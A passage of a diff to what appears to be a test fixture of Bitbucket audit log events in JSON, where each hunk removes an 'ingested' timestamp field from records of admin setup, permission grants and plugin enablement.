performed\"},\"affectedObjects\":[],\"changedValues\":[],\"source\":\"10.50.73.5\",\"system\":\"http://bitbucket.internal:7990\",\"node\":\"8767044c-1b98-4d64-82db-ef29af8c3792\",\"method\":\"Browser\",\"extraAttributes\":[{\"nameI18nKey\":\"atlassian.audit.event.attribute.id\",\"name\":\"ID Range\",\"value\":\"57 - 156\"},{\"nameI18nKey\":\"atlassian.audit.event.attribute.query\",\"name\":\"Query\",\"value\":\"\"},{\"nameI18nKey\":\"atlassian.audit.event.attribute.results\",\"name\":\"Results returned\",\"value\":\"100\"},{\"nameI18nKey\":\"atlassian.audit.event.attribute.timestamp\",\"name\":\"Timestamp Range\",\"value\":\"2021-11-27T17:29:12.364Z - 2021-11-27T17:35:33.093Z\"}]}", "type": "info", "kind": "event" @@ -1582,7 +1561,6 @@ }, "event": { "action": "atlassian.audit.event.action.audit.search", - "ingested": "2021-12-24T00:37:18.867701587Z", "original": "{\"timestamp\":\"2021-11-27T17:35:33.093Z\",\"author\":{\"name\":\"admin\",\"type\":\"NORMAL\",\"id\":\"2\",\"uri\":\"http://bitbucket.internal:7990/users/admin\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"atlassian.audit.event.category.audit\",\"category\":\"Auditing\",\"actionI18nKey\":\"atlassian.audit.event.action.audit.search\",\"action\":\"Audit Log search performed\"},\"affectedObjects\":[],\"changedValues\":[],\"source\":\"10.50.73.5\",\"system\":\"http://bitbucket.internal:7990\",\"node\":\"8767044c-1b98-4d64-82db-ef29af8c3792\",\"method\":\"Browser\",\"extraAttributes\":[{\"nameI18nKey\":\"atlassian.audit.event.attribute.id\",\"name\":\"ID Range\",\"value\":\"1 - 54\"},{\"nameI18nKey\":\"atlassian.audit.event.attribute.query\",\"name\":\"Query\",\"value\":\"\"},{\"nameI18nKey\":\"atlassian.audit.event.attribute.results\",\"name\":\"Results returned\",\"value\":\"54\"},{\"nameI18nKey\":\"atlassian.audit.event.attribute.timestamp\",\"name\":\"Timestamp Range\",\"value\":\"2021-11-27T17:26:25.045Z - 2021-11-27T17:29:11.102Z\"}]}", "type": "info", "kind": "event" @@ -1652,7 +1630,6 @@ }, "event": { "action": "atlassian.audit.event.action.audit.search", - "ingested": "2021-12-24T00:37:18.867702596Z", "original": "{\"timestamp\":\"2021-11-27T17:35:31.362Z\",\"author\":{\"name\":\"admin\",\"type\":\"NORMAL\",\"id\":\"2\",\"uri\":\"http://bitbucket.internal:7990/users/admin\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"atlassian.audit.event.category.audit\",\"category\":\"Auditing\",\"actionI18nKey\":\"atlassian.audit.event.action.audit.search\",\"action\":\"Audit Log search performed\"},\"affectedObjects\":[],\"changedValues\":[],\"source\":\"10.50.73.5\",\"system\":\"http://bitbucket.internal:7990\",\"node\":\"8767044c-1b98-4d64-82db-ef29af8c3792\",\"method\":\"Browser\",\"extraAttributes\":[{\"nameI18nKey\":\"atlassian.audit.event.attribute.id\",\"name\":\"ID Range\",\"value\":\"55 - 154\"},{\"nameI18nKey\":\"atlassian.audit.event.attribute.query\",\"name\":\"Query\",\"value\":\"\"},{\"nameI18nKey\":\"atlassian.audit.event.attribute.results\",\"name\":\"Results returned\",\"value\":\"100\"},{\"nameI18nKey\":\"atlassian.audit.event.attribute.timestamp\",\"name\":\"Timestamp Range\",\"value\":\"2021-11-27T17:29:11.242Z - 2021-11-27T17:35:11.898Z\"}]}", "type": "info", "kind": "event" @@ -1683,7 +1660,6 @@ }, "event": { "action": "bitbucket.search.audit.action.elasticsearchconfigurationchange", - "ingested": "2021-12-24T00:37:18.867703763Z", "original": "{\"timestamp\":\"2021-11-27T17:35:11.898Z\",\"author\":{\"name\":\"System\",\"type\":\"system\",\"id\":\"-1\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"bitbucket.service.audit.category.globaladministration\",\"category\":\"Global administration\",\"actionI18nKey\":\"bitbucket.search.audit.action.elasticsearchconfigurationchange\",\"action\":\"Elasticsearch settings changed\"},\"affectedObjects\":[],\"changedValues\":[{\"key\":\"Username\",\"i18nKey\":\"bitbucket.search.audit.changedvalue.elasticsearchconfigurationchange.username\",\"to\":\"bitbucket\"}],\"system\":\"http://bitbucket.internal:7990\",\"node\":\"8767044c-1b98-4d64-82db-ef29af8c3792\",\"method\":\"System\",\"extraAttributes\":[{\"nameI18nKey\":\"bitbucket.audit.attribute.legacy.details\",\"name\":\"details\",\"value\":\"{\\\"changed\\\":\\\",elasticsearchPasswordelasticsearchUsername\\\",\\\"username\\\":\\\"bitbucket\\\"}\"},{\"nameI18nKey\":\"bitbucket.audit.attribute.legacy.target\",\"name\":\"target\",\"value\":\"Elasticsearch\"}]}", "type": "info", "kind": "event" @@ -1774,7 +1750,6 @@ }, "event": { "action": "bitbucket.service.applicationconfiguration.audit.action.applicationsetup", - "ingested": "2021-12-24T00:37:18.867704718Z", "original": "{\"timestamp\":\"2021-11-27T17:34:26.112Z\",\"author\":{\"name\":\"Anonymous\",\"type\":\"user\",\"id\":\"-2\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"bitbucket.service.audit.category.globaladministration\",\"category\":\"Global administration\",\"actionI18nKey\":\"bitbucket.service.applicationconfiguration.audit.action.applicationsetup\",\"action\":\"Instance setup completed\"},\"affectedObjects\":[],\"changedValues\":[],\"source\":\"10.50.73.5\",\"system\":\"http://bitbucket.internal:7990\",\"node\":\"8767044c-1b98-4d64-82db-ef29af8c3792\",\"method\":\"Browser\",\"extraAttributes\":[{\"nameI18nKey\":\"bitbucket.audit.attribute.legacy.details\",\"name\":\"details\",\"value\":\"{\\\"new\\\":true,\\\"old\\\":false}\"},{\"nameI18nKey\":\"bitbucket.audit.attribute.legacy.target\",\"name\":\"target\",\"value\":\"SERVER_IS_SETUP\"}]}", "type": "info", "kind": "event" @@ -1848,7 +1823,6 @@ }, "event": { "action": "bitbucket.service.user.audit.action.globalpermissiongranted", - "ingested": "2021-12-24T00:37:18.867705664Z", "original": "{\"timestamp\":\"2021-11-27T17:34:26.108Z\",\"author\":{\"name\":\"Anonymous\",\"type\":\"user\",\"id\":\"-2\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"bitbucket.service.audit.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"bitbucket.service.user.audit.action.globalpermissiongranted\",\"action\":\"Global permission granted\"},\"affectedObjects\":[{\"name\":\"admin\",\"type\":\"USER\",\"uri\":\"http://bitbucket.internal:7990/users/admin\",\"id\":\"2\"}],\"changedValues\":[],\"source\":\"10.50.73.5\",\"system\":\"http://bitbucket.internal:7990\",\"node\":\"8767044c-1b98-4d64-82db-ef29af8c3792\",\"method\":\"Browser\",\"extraAttributes\":[{\"nameI18nKey\":\"bitbucket.service.user.audit.attribute.permission.permission\",\"name\":\"Permission\",\"value\":\"SYS_ADMIN\"},{\"nameI18nKey\":\"bitbucket.audit.attribute.legacy.details\",\"name\":\"details\",\"value\":\"{\\\"permission\\\":\\\"SYS_ADMIN\\\",\\\"user\\\":\\\"admin\\\"}\"},{\"nameI18nKey\":\"bitbucket.audit.attribute.legacy.target\",\"name\":\"target\",\"value\":\"Global\"}]}", "type": "info", "kind": "event" @@ -1922,7 +1896,6 @@ }, "event": { "action": "bitbucket.service.user.audit.action.globalpermissiongrantrequested", - "ingested": "2021-12-24T00:37:18.867706621Z", "original": "{\"timestamp\":\"2021-11-27T17:34:26.019Z\",\"author\":{\"name\":\"Anonymous\",\"type\":\"user\",\"id\":\"-2\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"bitbucket.service.audit.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"bitbucket.service.user.audit.action.globalpermissiongrantrequested\",\"action\":\"Global permission requested\"},\"affectedObjects\":[{\"name\":\"admin\",\"type\":\"USER\",\"uri\":\"http://bitbucket.internal:7990/users/admin\",\"id\":\"2\"}],\"changedValues\":[],\"source\":\"10.50.73.5\",\"system\":\"http://bitbucket.internal:7990\",\"node\":\"8767044c-1b98-4d64-82db-ef29af8c3792\",\"method\":\"Browser\",\"extraAttributes\":[{\"nameI18nKey\":\"bitbucket.service.user.audit.attribute.permission.permission\",\"name\":\"Permission\",\"value\":\"SYS_ADMIN\"},{\"nameI18nKey\":\"bitbucket.audit.attribute.legacy.details\",\"name\":\"details\",\"value\":\"{\\\"permission\\\":\\\"SYS_ADMIN\\\",\\\"user\\\":\\\"admin\\\"}\"},{\"nameI18nKey\":\"bitbucket.audit.attribute.legacy.target\",\"name\":\"target\",\"value\":\"Global\"}]}", "type": "info", "kind": "event" @@ -2003,7 +1976,6 @@ }, "event": { "action": "bitbucket.service.user.audit.action.groupmembershipscreated.user", - "ingested": "2021-12-24T00:37:18.867707611Z", "original": "{\"timestamp\":\"2021-11-27T17:34:25.313Z\",\"author\":{\"name\":\"Anonymous\",\"type\":\"user\",\"id\":\"-2\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"bitbucket.service.audit.category.usersandgroups\",\"category\":\"Users and groups\",\"actionI18nKey\":\"bitbucket.service.user.audit.action.groupmembershipscreated.user\",\"action\":\"User added to user group\"},\"affectedObjects\":[{\"name\":\"stash-users\",\"type\":\"GROUP\",\"uri\":\"http://bitbucket.internal:7990/admin/groups/view?name=stash-users\",\"id\":\"stash-users\"},{\"name\":\"admin\",\"type\":\"USER\",\"uri\":\"http://bitbucket.internal:7990/users/admin\",\"id\":\"2\"}],\"changedValues\":[],\"source\":\"10.50.73.5\",\"system\":\"http://bitbucket.internal:7990\",\"node\":\"8767044c-1b98-4d64-82db-ef29af8c3792\",\"method\":\"Browser\",\"extraAttributes\":[{\"nameI18nKey\":\"bitbucket.service.user.audit.attribute.groupmembership.parentgroup\",\"name\":\"Parent group\",\"value\":\"stash-users\"},{\"nameI18nKey\":\"bitbucket.audit.attribute.legacy.details\",\"name\":\"details\",\"value\":\"{\\\"entities\\\":[\\\"admin\\\"],\\\"membership\\\":\\\"GROUP_USER\\\"}\"},{\"nameI18nKey\":\"bitbucket.audit.attribute.legacy.target\",\"name\":\"target\",\"value\":\"stash-users\"}]}", "type": [ "group", @@ -2082,7 +2054,6 @@ }, "event": { "action": "bitbucket.service.user.audit.action.usercreated", - "ingested": "2021-12-24T00:37:18.867708499Z", "original": "{\"timestamp\":\"2021-11-27T17:34:24.078Z\",\"author\":{\"name\":\"Anonymous\",\"type\":\"user\",\"id\":\"-2\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"bitbucket.service.audit.category.usersandgroups\",\"category\":\"Users and groups\",\"actionI18nKey\":\"bitbucket.service.user.audit.action.usercreated\",\"action\":\"User created\"},\"affectedObjects\":[{\"name\":\"admin\",\"type\":\"USER\",\"uri\":\"http://bitbucket.internal:7990/users/admin\",\"id\":\"2\"}],\"changedValues\":[],\"source\":\"10.50.73.5\",\"system\":\"http://bitbucket.internal:7990\",\"node\":\"8767044c-1b98-4d64-82db-ef29af8c3792\",\"method\":\"Browser\",\"extraAttributes\":[{\"nameI18nKey\":\"bitbucket.audit.attribute.legacy.target\",\"name\":\"target\",\"value\":\"admin\"}]}", "type": [ "user", @@ -2148,7 +2119,6 @@ }, "event": { "action": "bitbucket.service.license.audit.action.licensechanged", - "ingested": "2021-12-24T00:37:18.867709514Z", "original": "{\"timestamp\":\"2021-11-27T17:31:41.984Z\",\"author\":{\"name\":\"Anonymous\",\"type\":\"user\",\"id\":\"-2\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"bitbucket.service.audit.category.globaladministration\",\"category\":\"Global administration\",\"actionI18nKey\":\"bitbucket.service.license.audit.action.licensechanged\",\"action\":\"Product license changed\"},\"affectedObjects\":[],\"changedValues\":[],\"source\":\"10.50.73.5\",\"system\":\"http://bitbucket.internal:7990\",\"node\":\"8767044c-1b98-4d64-82db-ef29af8c3792\",\"method\":\"Browser\",\"extraAttributes\":[{\"nameI18nKey\":\"bitbucket.audit.attribute.legacy.target\",\"name\":\"target\",\"value\":\"System\"}]}", "type": "info", "kind": "event" @@ -2216,7 +2186,6 @@ }, "event": { "action": "bitbucket.service.applicationconfiguration.audit.action.baseurlchanged", - "ingested": "2021-12-24T00:37:18.867710499Z", "original": "{\"timestamp\":\"2021-11-27T17:31:41.375Z\",\"author\":{\"name\":\"Anonymous\",\"type\":\"user\",\"id\":\"-2\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"bitbucket.service.audit.category.globaladministration\",\"category\":\"Global administration\",\"actionI18nKey\":\"bitbucket.service.applicationconfiguration.audit.action.baseurlchanged\",\"action\":\"Base URL changed\"},\"affectedObjects\":[],\"changedValues\":[{\"key\":\"Base URL\",\"i18nKey\":\"bitbucket.service.applicationconfiguration.audit.changedvalue.baseurlchanged.baseurl\",\"to\":\"http://bitbucket.internal:7990\"}],\"source\":\"10.50.73.5\",\"system\":\"http://bitbucket.internal:7990\",\"node\":\"8767044c-1b98-4d64-82db-ef29af8c3792\",\"method\":\"Browser\",\"extraAttributes\":[{\"nameI18nKey\":\"bitbucket.audit.attribute.legacy.details\",\"name\":\"details\",\"value\":\"{\\\"new\\\":\\\"http://bitbucket.internal:7990\\\",\\\"old\\\":null}\"},{\"nameI18nKey\":\"bitbucket.audit.attribute.legacy.target\",\"name\":\"target\",\"value\":\"BASE_URL\"}]}", "type": "info", "kind": "event" @@ -2241,7 +2210,6 @@ }, "event": { "action": "bitbucket.service.plugin.audit.action.pluginenabled", - "ingested": "2021-12-24T00:37:18.867711391Z", "original": "{\"timestamp\":\"2021-11-27T17:29:52.694Z\",\"author\":{\"name\":\"System\",\"type\":\"system\",\"id\":\"-1\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"bitbucket.service.audit.category.apps\",\"category\":\"Apps\",\"actionI18nKey\":\"bitbucket.service.plugin.audit.action.pluginenabled\",\"action\":\"Plugin enabled\"},\"affectedObjects\":[{\"name\":\"tac.bitbucket.languages.ja_JP\",\"type\":\"MISC\"}],\"changedValues\":[],\"node\":\"8767044c-1b98-4d64-82db-ef29af8c3792\",\"method\":\"System\",\"extraAttributes\":[{\"nameI18nKey\":\"bitbucket.service.plugin.audit.attribute.version\",\"name\":\"Version\",\"value\":\"7.18.0.rc1-202111050047\"},{\"nameI18nKey\":\"bitbucket.audit.attribute.legacy.target\",\"name\":\"target\",\"value\":\"tac.bitbucket.languages.ja_JP\"}]}", "type": "info", "kind": "event" @@ -2295,7 +2263,6 @@ }, "event": { "action": "bitbucket.service.plugin.audit.action.pluginenabled", - "ingested": "2021-12-24T00:37:18.867712381Z", "original": "{\"timestamp\":\"2021-11-27T17:29:52.688Z\",\"author\":{\"name\":\"System\",\"type\":\"system\",\"id\":\"-1\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"bitbucket.service.audit.category.apps\",\"category\":\"Apps\",\"actionI18nKey\":\"bitbucket.service.plugin.audit.action.pluginenabled\",\"action\":\"Plugin enabled\"},\"affectedObjects\":[{\"name\":\"tac.bitbucket.languages.fr_FR\",\"type\":\"MISC\"}],\"changedValues\":[],\"node\":\"8767044c-1b98-4d64-82db-ef29af8c3792\",\"method\":\"System\",\"extraAttributes\":[{\"nameI18nKey\":\"bitbucket.service.plugin.audit.attribute.version\",\"name\":\"Version\",\"value\":\"7.18.0.rc1-202111050047\"},{\"nameI18nKey\":\"bitbucket.audit.attribute.legacy.target\",\"name\":\"target\",\"value\":\"tac.bitbucket.languages.fr_FR\"}]}", "type": "info", "kind": "event" @@ -2349,7 +2316,6 @@ }, "event": { "action": "bitbucket.service.plugin.audit.action.pluginenabled", - "ingested": "2021-12-24T00:37:18.867713333Z", "original": "{\"timestamp\":\"2021-11-27T17:29:52.681Z\",\"author\":{\"name\":\"System\",\"type\":\"system\",\"id\":\"-1\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"bitbucket.service.audit.category.apps\",\"category\":\"Apps\",\"actionI18nKey\":\"bitbucket.service.plugin.audit.action.pluginenabled\",\"action\":\"Plugin enabled\"},\"affectedObjects\":[{\"name\":\"tac.bitbucket.languages.de_DE\",\"type\":\"MISC\"}],\"changedValues\":[],\"node\":\"8767044c-1b98-4d64-82db-ef29af8c3792\",\"method\":\"System\",\"extraAttributes\":[{\"nameI18nKey\":\"bitbucket.service.plugin.audit.attribute.version\",\"name\":\"Version\",\"value\":\"7.18.0.rc1-202111050047\"},{\"nameI18nKey\":\"bitbucket.audit.attribute.legacy.target\",\"name\":\"target\",\"value\":\"tac.bitbucket.languages.de_DE\"}]}", "type": "info", "kind": "event" @@ -2403,7 +2369,6 @@ }, "event": { "action": "bitbucket.service.plugin.audit.action.pluginenabled", - "ingested": "2021-12-24T00:37:18.867714509Z", "original": "{\"timestamp\":\"2021-11-27T17:29:52.674Z\",\"author\":{\"name\":\"System\",\"type\":\"system\",\"id\":\"-1\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"bitbucket.service.audit.category.apps\",\"category\":\"Apps\",\"actionI18nKey\":\"bitbucket.service.plugin.audit.action.pluginenabled\",\"action\":\"Plugin enabled\"},\"affectedObjects\":[{\"name\":\"com.springsource.net.jcip.annotations-1.0.0\",\"type\":\"MISC\"}],\"changedValues\":[],\"node\":\"8767044c-1b98-4d64-82db-ef29af8c3792\",\"method\":\"System\",\"extraAttributes\":[{\"nameI18nKey\":\"bitbucket.service.plugin.audit.attribute.version\",\"name\":\"Version\",\"value\":\"1.0.0\"},{\"nameI18nKey\":\"bitbucket.audit.attribute.legacy.target\",\"name\":\"target\",\"value\":\"com.springsource.net.jcip.annotations-1.0.0\"}]}", "type": "info", "kind": "event" @@ -2457,7 +2422,6 @@ }, "event": { "action": "bitbucket.service.plugin.audit.action.pluginenabled", - "ingested": "2021-12-24T00:37:18.867715459Z", "original": "{\"timestamp\":\"2021-11-27T17:29:52.672Z\",\"author\":{\"name\":\"System\",\"type\":\"system\",\"id\":\"-1\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"bitbucket.service.audit.category.apps\",\"category\":\"Apps\",\"actionI18nKey\":\"bitbucket.service.plugin.audit.action.pluginenabled\",\"action\":\"Plugin enabled\"},\"affectedObjects\":[{\"name\":\"com.atlassian.zdu.bitbucket-zdu-plugin\",\"type\":\"MISC\"}],\"changedValues\":[],\"node\":\"8767044c-1b98-4d64-82db-ef29af8c3792\",\"method\":\"System\",\"extraAttributes\":[{\"nameI18nKey\":\"bitbucket.service.plugin.audit.attribute.version\",\"name\":\"Version\",\"value\":\"1.1.4\"},{\"nameI18nKey\":\"bitbucket.audit.attribute.legacy.target\",\"name\":\"target\",\"value\":\"com.atlassian.zdu.bitbucket-zdu-plugin\"}]}", "type": "info", "kind": "event" @@ -2511,7 +2475,6 @@ }, "event": { "action": "bitbucket.service.plugin.audit.action.pluginenabled", - "ingested": "2021-12-24T00:37:18.867716389Z", "original": "{\"timestamp\":\"2021-11-27T17:29:52.560Z\",\"author\":{\"name\":\"System\",\"type\":\"system\",\"id\":\"-1\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"bitbucket.service.audit.category.apps\",\"category\":\"Apps\",\"actionI18nKey\":\"bitbucket.service.plugin.audit.action.pluginenabled\",\"action\":\"Plugin enabled\"},\"affectedObjects\":[{\"name\":\"com.atlassian.webhooks.atlassian-webhooks-plugin\",\"type\":\"MISC\"}],\"changedValues\":[],\"node\":\"8767044c-1b98-4d64-82db-ef29af8c3792\",\"method\":\"System\",\"extraAttributes\":[{\"nameI18nKey\":\"bitbucket.service.plugin.audit.attribute.version\",\"name\":\"Version\",\"value\":\"6.1.6\"},{\"nameI18nKey\":\"bitbucket.audit.attribute.legacy.target\",\"name\":\"target\",\"value\":\"com.atlassian.webhooks.atlassian-webhooks-plugin\"}]}", "type": "info", "kind": "event" @@ -2565,7 +2528,6 @@ }, "event": { "action": "bitbucket.service.plugin.audit.action.pluginenabled", - "ingested": "2021-12-24T00:37:18.867717338Z", "original": "{\"timestamp\":\"2021-11-27T17:29:52.557Z\",\"author\":{\"name\":\"System\",\"type\":\"system\",\"id\":\"-1\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"bitbucket.service.audit.category.apps\",\"category\":\"Apps\",\"actionI18nKey\":\"bitbucket.service.plugin.audit.action.pluginenabled\",\"action\":\"Plugin enabled\"},\"affectedObjects\":[{\"name\":\"com.atlassian.troubleshooting.plugin-bitbucket\",\"type\":\"MISC\"}],\"changedValues\":[],\"node\":\"8767044c-1b98-4d64-82db-ef29af8c3792\",\"method\":\"System\",\"extraAttributes\":[{\"nameI18nKey\":\"bitbucket.service.plugin.audit.attribute.version\",\"name\":\"Version\",\"value\":\"1.33.1\"},{\"nameI18nKey\":\"bitbucket.audit.attribute.legacy.target\",\"name\":\"target\",\"value\":\"com.atlassian.troubleshooting.plugin-bitbucket\"}]}", "type": "info", "kind": "event" @@ -2619,7 +2581,6 @@ }, "event": { "action": "bitbucket.service.plugin.audit.action.pluginenabled", - "ingested": "2021-12-24T00:37:18.867718304Z", "original": "{\"timestamp\":\"2021-11-27T17:29:52.502Z\",\"author\":{\"name\":\"System\",\"type\":\"system\",\"id\":\"-1\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"bitbucket.service.audit.category.apps\",\"category\":\"Apps\",\"actionI18nKey\":\"bitbucket.service.plugin.audit.action.pluginenabled\",\"action\":\"Plugin enabled\"},\"affectedObjects\":[{\"name\":\"com.atlassian.stash.plugins.stash-remote-event-bitbucket-server-spi\",\"type\":\"MISC\"}],\"changedValues\":[],\"node\":\"8767044c-1b98-4d64-82db-ef29af8c3792\",\"method\":\"System\",\"extraAttributes\":[{\"nameI18nKey\":\"bitbucket.service.plugin.audit.attribute.version\",\"name\":\"Version\",\"value\":\"0.9.2\"},{\"nameI18nKey\":\"bitbucket.audit.attribute.legacy.target\",\"name\":\"target\",\"value\":\"com.atlassian.stash.plugins.stash-remote-event-bitbucket-server-spi\"}]}", "type": "info", "kind": "event" @@ -2673,7 +2634,6 @@ }, "event": { "action": "bitbucket.service.plugin.audit.action.pluginenabled", - "ingested": "2021-12-24T00:37:18.867719252Z", "original": "{\"timestamp\":\"2021-11-27T17:29:52.491Z\",\"author\":{\"name\":\"System\",\"type\":\"system\",\"id\":\"-1\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"bitbucket.service.audit.category.apps\",\"category\":\"Apps\",\"actionI18nKey\":\"bitbucket.service.plugin.audit.action.pluginenabled\",\"action\":\"Plugin enabled\"},\"affectedObjects\":[{\"name\":\"com.atlassian.soy.soy-template-plugin\",\"type\":\"MISC\"}],\"changedValues\":[],\"node\":\"8767044c-1b98-4d64-82db-ef29af8c3792\",\"method\":\"System\",\"extraAttributes\":[{\"nameI18nKey\":\"bitbucket.service.plugin.audit.attribute.version\",\"name\":\"Version\",\"value\":\"5.1.1\"},{\"nameI18nKey\":\"bitbucket.audit.attribute.legacy.target\",\"name\":\"target\",\"value\":\"com.atlassian.soy.soy-template-plugin\"}]}", "type": "info", "kind": "event" @@ -2727,7 +2687,6 @@ }, "event": { "action": "bitbucket.service.plugin.audit.action.pluginenabled", - "ingested": "2021-12-24T00:37:18.867720214Z", "original": "{\"timestamp\":\"2021-11-27T17:29:52.477Z\",\"author\":{\"name\":\"System\",\"type\":\"system\",\"id\":\"-1\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"bitbucket.service.audit.category.apps\",\"category\":\"Apps\",\"actionI18nKey\":\"bitbucket.service.plugin.audit.action.pluginenabled\",\"action\":\"Plugin enabled\"},\"affectedObjects\":[{\"name\":\"com.atlassian.prettyurls.atlassian-pretty-urls-plugin\",\"type\":\"MISC\"}],\"changedValues\":[],\"node\":\"8767044c-1b98-4d64-82db-ef29af8c3792\",\"method\":\"System\",\"extraAttributes\":[{\"nameI18nKey\":\"bitbucket.service.plugin.audit.attribute.version\",\"name\":\"Version\",\"value\":\"3.0.3\"},{\"nameI18nKey\":\"bitbucket.audit.attribute.legacy.target\",\"name\":\"target\",\"value\":\"com.atlassian.prettyurls.atlassian-pretty-urls-plugin\"}]}", "type": "info", "kind": "event" @@ -2781,7 +2740,6 @@ }, "event": { "action": "bitbucket.service.plugin.audit.action.pluginenabled", - "ingested": "2021-12-24T00:37:18.867721478Z", "original": "{\"timestamp\":\"2021-11-27T17:29:52.472Z\",\"author\":{\"name\":\"System\",\"type\":\"system\",\"id\":\"-1\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"bitbucket.service.audit.category.apps\",\"category\":\"Apps\",\"actionI18nKey\":\"bitbucket.service.plugin.audit.action.pluginenabled\",\"action\":\"Plugin enabled\"},\"affectedObjects\":[{\"name\":\"com.atlassian.plugins.static-assets-url\",\"type\":\"MISC\"}],\"changedValues\":[],\"node\":\"8767044c-1b98-4d64-82db-ef29af8c3792\",\"method\":\"System\",\"extraAttributes\":[{\"nameI18nKey\":\"bitbucket.service.plugin.audit.attribute.version\",\"name\":\"Version\",\"value\":\"2.0.1\"},{\"nameI18nKey\":\"bitbucket.audit.attribute.legacy.target\",\"name\":\"target\",\"value\":\"com.atlassian.plugins.static-assets-url\"}]}", "type": "info", "kind": "event" @@ -2835,7 +2793,6 @@ }, "event": { "action": "bitbucket.service.plugin.audit.action.pluginenabled", - "ingested": "2021-12-24T00:37:18.867722416Z", "original": "{\"timestamp\":\"2021-11-27T17:29:52.450Z\",\"author\":{\"name\":\"System\",\"type\":\"system\",\"id\":\"-1\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"bitbucket.service.audit.category.apps\",\"category\":\"Apps\",\"actionI18nKey\":\"bitbucket.service.plugin.audit.action.pluginenabled\",\"action\":\"Plugin enabled\"},\"affectedObjects\":[{\"name\":\"com.atlassian.plugins.shortcuts.atlassian-shortcuts-plugin\",\"type\":\"MISC\"}],\"changedValues\":[],\"node\":\"8767044c-1b98-4d64-82db-ef29af8c3792\",\"method\":\"System\",\"extraAttributes\":[{\"nameI18nKey\":\"bitbucket.service.plugin.audit.attribute.version\",\"name\":\"Version\",\"value\":\"1.3.2\"},{\"nameI18nKey\":\"bitbucket.audit.attribute.legacy.target\",\"name\":\"target\",\"value\":\"com.atlassian.plugins.shortcuts.atlassian-shortcuts-plugin\"}]}", "type": "info", "kind": "event" @@ -2889,7 +2846,6 @@ }, "event": { "action": "bitbucket.service.plugin.audit.action.pluginenabled", - "ingested": "2021-12-24T00:37:18.867723346Z", "original": "{\"timestamp\":\"2021-11-27T17:29:52.439Z\",\"author\":{\"name\":\"System\",\"type\":\"system\",\"id\":\"-1\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"bitbucket.service.audit.category.apps\",\"category\":\"Apps\",\"actionI18nKey\":\"bitbucket.service.plugin.audit.action.pluginenabled\",\"action\":\"Plugin enabled\"},\"affectedObjects\":[{\"name\":\"com.atlassian.plugins.less-transformer-plugin\",\"type\":\"MISC\"}],\"changedValues\":[],\"node\":\"8767044c-1b98-4d64-82db-ef29af8c3792\",\"method\":\"System\",\"extraAttributes\":[{\"nameI18nKey\":\"bitbucket.service.plugin.audit.attribute.version\",\"name\":\"Version\",\"value\":\"4.0.0\"},{\"nameI18nKey\":\"bitbucket.audit.attribute.legacy.target\",\"name\":\"target\",\"value\":\"com.atlassian.plugins.less-transformer-plugin\"}]}", "type": "info", "kind": "event" @@ -2943,7 +2899,6 @@ }, "event": { "action": "bitbucket.service.plugin.audit.action.pluginenabled", - "ingested": "2021-12-24T00:37:18.867724349Z", "original": "{\"timestamp\":\"2021-11-27T17:29:52.216Z\",\"author\":{\"name\":\"System\",\"type\":\"system\",\"id\":\"-1\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"bitbucket.service.audit.category.apps\",\"category\":\"Apps\",\"actionI18nKey\":\"bitbucket.service.plugin.audit.action.pluginenabled\",\"action\":\"Plugin enabled\"},\"affectedObjects\":[{\"name\":\"com.atlassian.plugins.jquery\",\"type\":\"MISC\"}],\"changedValues\":[],\"node\":\"8767044c-1b98-4d64-82db-ef29af8c3792\",\"method\":\"System\",\"extraAttributes\":[{\"nameI18nKey\":\"bitbucket.service.plugin.audit.attribute.version\",\"name\":\"Version\",\"value\":\"2.2.4.11-c72c117\"},{\"nameI18nKey\":\"bitbucket.audit.attribute.legacy.target\",\"name\":\"target\",\"value\":\"com.atlassian.plugins.jquery\"}]}", "type": "info", "kind": "event" @@ -2997,7 +2952,6 @@ }, "event": { "action": "bitbucket.service.plugin.audit.action.pluginenabled", - "ingested": "2021-12-24T00:37:18.867725486Z", "original": "{\"timestamp\":\"2021-11-27T17:29:52.214Z\",\"author\":{\"name\":\"System\",\"type\":\"system\",\"id\":\"-1\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"bitbucket.service.audit.category.apps\",\"category\":\"Apps\",\"actionI18nKey\":\"bitbucket.service.plugin.audit.action.pluginenabled\",\"action\":\"Plugin enabled\"},\"affectedObjects\":[{\"name\":\"com.atlassian.plugins.issue-status-plugin\",\"type\":\"MISC\"}],\"changedValues\":[],\"node\":\"8767044c-1b98-4d64-82db-ef29af8c3792\",\"method\":\"System\",\"extraAttributes\":[{\"nameI18nKey\":\"bitbucket.service.plugin.audit.attribute.version\",\"name\":\"Version\",\"value\":\"2.1.1\"},{\"nameI18nKey\":\"bitbucket.audit.attribute.legacy.target\",\"name\":\"target\",\"value\":\"com.atlassian.plugins.issue-status-plugin\"}]}", "type": "info", "kind": "event" @@ -3051,7 +3005,6 @@ }, "event": { "action": "bitbucket.service.plugin.audit.action.pluginenabled", - "ingested": "2021-12-24T00:37:18.867726445Z", "original": 